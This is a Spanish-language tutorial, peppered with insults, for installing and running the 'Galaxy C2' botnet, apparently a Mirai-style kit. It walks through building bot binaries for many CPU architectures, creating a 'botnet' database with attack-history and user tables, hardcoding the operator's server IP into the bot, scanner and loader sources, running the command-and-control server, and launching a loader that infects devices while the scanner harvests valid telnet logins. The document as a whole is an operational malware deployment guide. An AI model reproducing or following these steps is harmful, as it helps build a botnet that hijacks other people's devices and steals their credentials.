// TUTORIAL PARA INSTALAR GALAXY C2

Usaremos debian 11 para esta instalacion

///////////////////////////////////////////////////

STEP 1:
apt-get update -y
apt-get upgrade -y
apt-get install gcc g++ python3 python3-pip electric-fence sudo git wget curl screen -y

///////////////////////////////////////////////////

STEP 2: Copia y pega todo

cd /tmp
wget https://dl.google.com/go/go1.18.linux-amd64.tar.gz
sha256sum go1.18.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.18.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
export GOROOT=/usr/local/go
export GOPATH=$HOME/Projects/Proj1
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
export GO111MODULE=on
export GOROOT=/usr/local/go; export GOPATH=$HOME/Projects/Proj1; export PATH=$GOPATH/bin:$GOROOT/bin:$PATH; go get github.com/go-sql-driver/mysql; go get github.com/mattn/go-shellwords
source ~/.bash_profile
go version
go env
cd ~/

///////////////////////////////////////////////////

STEP 3: Descargamos los cross-compilers para compilar las arquictecturas de nuestra src

mkdir /etc/xcompile
cd /etc/xcompile

 
tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-i686.tar.bz2
tar -jxf cross-compiler-x86_64.tar.bz2
tar -jxf cross-compiler-m68k.tar.bz2
tar -jxf cross-compiler-mips.tar.bz2
tar -jxf cross-compiler-mipsel.tar.bz2
tar -jxf cross-compiler-powerpc.tar.bz2
tar -jxf cross-compiler-sh4.tar.bz2
tar -jxf cross-compiler-sparc.tar.bz2
tar -jxf cross-compiler-armv4l.tar.bz2
tar -jxf cross-compiler-armv5l.tar.bz2
tar -jxf cross-compiler-armv6l.tar.bz2
tar -jxf cross-compiler-armv7l.tar.bz2
tar -vxf arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux_install.tar.gz
rm -rf *.tar.bz2
rm -rf *.tar.gz
mv cross-compiler-i686 i686
mv cross-compiler-x86_64 x86_64
mv cross-compiler-i586 i586
mv cross-compiler-m68k m68k
mv cross-compiler-mips mips
mv cross-compiler-mipsel mipsel
mv cross-compiler-powerpc powerpc
mv cross-compiler-sh4 sh4
mv cross-compiler-sparc sparc
mv cross-compiler-armv4l armv4l
mv cross-compiler-armv5l armv5l
mv cross-compiler-armv6l armv6l
mv cross-compiler-armv7l armv7l
mv arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux_install arc

///////////////////////////////////////////////////

STEP 4: Luego de tener los cross listo vamos a crear la base de datos para la cnc

apt install mariadb-server -y
service mariadb restart

aqui le asignamos una contraseña a nuestro mysql con este comando
mysql_secure_installation

luego ingresamos a nuestro mysql con este comando
mysql -u root -pnegro

una vez dentro ponemos esto.

CREATE DATABASE botnet;
use botnet;
CREATE TABLE `history` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int(10) unsigned NOT NULL,
  `time_sent` int(10) unsigned NOT NULL,
  `duration` int(10) unsigned NOT NULL,
  `command` text NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
);
 
CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `username` varchar(32) NOT NULL,
  `password` varchar(32) NOT NULL,
  `duration_limit` int(10) unsigned DEFAULT NULL,
  `cooldown` int(10) unsigned NOT NULL,
  `wrc` int(10) unsigned DEFAULT NULL,
  `last_paid` int(10) unsigned NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  `admin` int(10) unsigned DEFAULT '0',
  `intvl` int(10) unsigned DEFAULT '30',
  `api_key` text,
  PRIMARY KEY (`id`),
  KEY `username` (`username`)
);
 
CREATE TABLE `whitelist` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `prefix` varchar(16) DEFAULT NULL,
  `netmask` tinyint(3) unsigned DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `prefix` (`prefix`)
);
INSERT INTO users VALUES (NULL, 'root', 'mierda', 0, 0, 0, 0, -1, 1, 30, '');
exit;


///////////////////////////////////////////////////

STEP 5: ahora atento a lo que viene

Vamos a la carpeta cnc y editamos main.go la linea 12 y ingresamos la contraseña que asignamos a nuestra mysql anteriormente

Ahora vamos a la carpeta bot y editamos main.c vamos a la linea 423 y cambiaremos 1,1,1,1 por la ip de nuestra vps, no uses . usa , dawn de mierda

Ahora editamos scanner.c vamos a la linea 431 y hacemos la misma operacion

Ahora vamos a la carpeta loader/src/headers y editamos config.h y remplazamos 1.1.1.1 por la ip de nuesta vps esta vez con .

Ahora vamos a la carpeta dlr y editamos main.c la linea 8 y ponemos la ip de nuestra vps usando , puto down

///////////////////////////////////////////////////

STEP 6: momento de instalar todo

cd ~/

chmod 777 build.sh

bash build.sh

si queremos tener nuestro payload para usar otros loaders ejecutamos payload.py y este nos genera un payload

///////////////////////////////////////////////////

STEP 7: Luego de instalar todo ejecutamos lo siguiente

nano /usr/include/x86_64-linux-gnu/bits/typesizes.h

vamos a la ultima linea y editamos el 1024 por 99999

siguiente comando
ulimit -n99999; ulimit -u99999; ulimit -e99999

ahora usaremos screen para que nuestra botnet este 24/7 prendida como tu madre

para iniciar el cnc vamos al /root y ejecutamos
screen -S cnc ./cnc

una vez iniciada nuestra cnc presionamos cntrl + a + d para salir del screen

cd loader

screen -S listen ./scanListen

ahora iniciamos nuestro server web/ftp

cd server

chmod 777 main
screen -S server ./main

para renaudar un screen usamos screen -r cnc o listen y para salir cntrl + a + d puta de mierda

///////////////////////////////////////////////////

STEP 8: conectamos a nuesta botnet

usaremos telnet para conectarnos al puerto 5220 con nuestra ip de la vps

telnet 1.1.1.1 5220

ingresamos el usuario y contraseña que asignamos en la mysql

///////////////////////////////////////////////////

CARGAR BOTS:

cd loader

ulimit -n99999
bash run.sh

y esperamos a que el loader pruebe toda la lista y empezaran a conectarse bots a nuestra botnet

///////////////////////////////////////////////////

el scanListen recibira todos los telnets validos que nuestros bots encuentren y lo guardaran en un .txt pedazo de mierda








